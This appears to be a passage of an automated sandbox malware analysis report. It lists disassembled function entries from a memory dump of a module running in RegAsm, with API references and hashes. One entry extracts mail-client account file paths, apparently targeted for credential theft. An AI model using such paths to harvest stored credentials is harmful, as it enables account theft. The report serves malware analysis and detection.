                                                                                                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                              • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                              • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strlen
                                                                                                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                              • API String ID: 4218353326-230879103
                                                                                                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                              • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                              • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                              APIs
                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                              • _free.LIBCMT ref: 10007CFB
                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                              • _free.LIBCMT ref: 10007D1D
                                                                                                                                              • _free.LIBCMT ref: 10007D32
                                                                                                                                              • _free.LIBCMT ref: 10007D3D
                                                                                                                                              • _free.LIBCMT ref: 10007D5F
                                                                                                                                              • _free.LIBCMT ref: 10007D72
                                                                                                                                              • _free.LIBCMT ref: 10007D80
                                                                                                                                              • _free.LIBCMT ref: 10007D8B
                                                                                                                                              • _free.LIBCMT ref: 10007DC3
                                                                                                                                              • _free.LIBCMT ref: 10007DCA
                                                                                                                                              • _free.LIBCMT ref: 10007DE7
                                                                                                                                              • _free.LIBCMT ref: 10007DFF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                              • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                              • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                              • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                              • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 100059EA
                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                              • _free.LIBCMT ref: 100059F6
                                                                                                                                              • _free.LIBCMT ref: 10005A01
                                                                                                                                              • _free.LIBCMT ref: 10005A0C
                                                                                                                                              • _free.LIBCMT ref: 10005A17
                                                                                                                                              • _free.LIBCMT ref: 10005A22
                                                                                                                                              • _free.LIBCMT ref: 10005A2D
                                                                                                                                              • _free.LIBCMT ref: 10005A38
                                                                                                                                              • _free.LIBCMT ref: 10005A43
                                                                                                                                              • _free.LIBCMT ref: 10005A51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                              • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                              • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                              • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                              • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                              APIs
                                                                                                                                              • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                              • __fassign.LIBCMT ref: 1000954F
                                                                                                                                              • __fassign.LIBCMT ref: 1000956A
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                              • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                              • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                              • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                              • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                              APIs
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                              • String ID: csm
                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                              • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                              • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                              • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                              • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                              • _free.LIBCMT ref: 100092AB
                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                              • _free.LIBCMT ref: 100092B6
                                                                                                                                              • _free.LIBCMT ref: 100092C1
                                                                                                                                              • _free.LIBCMT ref: 10009315
                                                                                                                                              • _free.LIBCMT ref: 10009320
                                                                                                                                              • _free.LIBCMT ref: 1000932B
                                                                                                                                              • _free.LIBCMT ref: 10009336
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                              • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                              • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                              APIs
                                                                                                                                              • _strlen.LIBCMT ref: 10001607
                                                                                                                                              • _strcat.LIBCMT ref: 1000161D
                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                              • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                              • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1922816806-0
                                                                                                                                              • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                              • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                              • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                              • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                              APIs
                                                                                                                                              • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3594823470-0
                                                                                                                                              • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                              • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                              • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                              • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                              • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                              • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                              • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                              • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                              • _free.LIBCMT ref: 10005B2D
                                                                                                                                              • _free.LIBCMT ref: 10005B55
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                              • _abort.LIBCMT ref: 10005B74
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                              • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                              • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                              • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                              • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                              • API String ID: 4036392271-1520055953
                                                                                                                                              • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                              • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                              • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                              • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                              APIs
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                              • _free.LIBCMT ref: 100071B8
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                              • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                              • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                              • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                              • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                              • _free.LIBCMT ref: 10005BB4
                                                                                                                                              • _free.LIBCMT ref: 10005BDB
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                              • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                              • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                              • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                              • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                              • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                              • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                              • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                              • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$lstrcat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 493641738-0
                                                                                                                                              • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                              • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                              • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                              • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 100091D0
                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                              • _free.LIBCMT ref: 100091E2
                                                                                                                                              • _free.LIBCMT ref: 100091F4
                                                                                                                                              • _free.LIBCMT ref: 10009206
                                                                                                                                              • _free.LIBCMT ref: 10009218
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.850152916.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.850134396.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.850152916.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                              • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                              • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                              • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                              • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 1000536F
                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                              • _free.LIBCMT ref: 10005381
                                                                                                                                              • _free.LIBCMT ref: 10005394
                                                                                                                                              • _free.LIBCMT ref: 100053A5
                                                                                                                                              • _free.LIBCMT ref: 100053B6
                                                                                                                                              Memory Dump Source
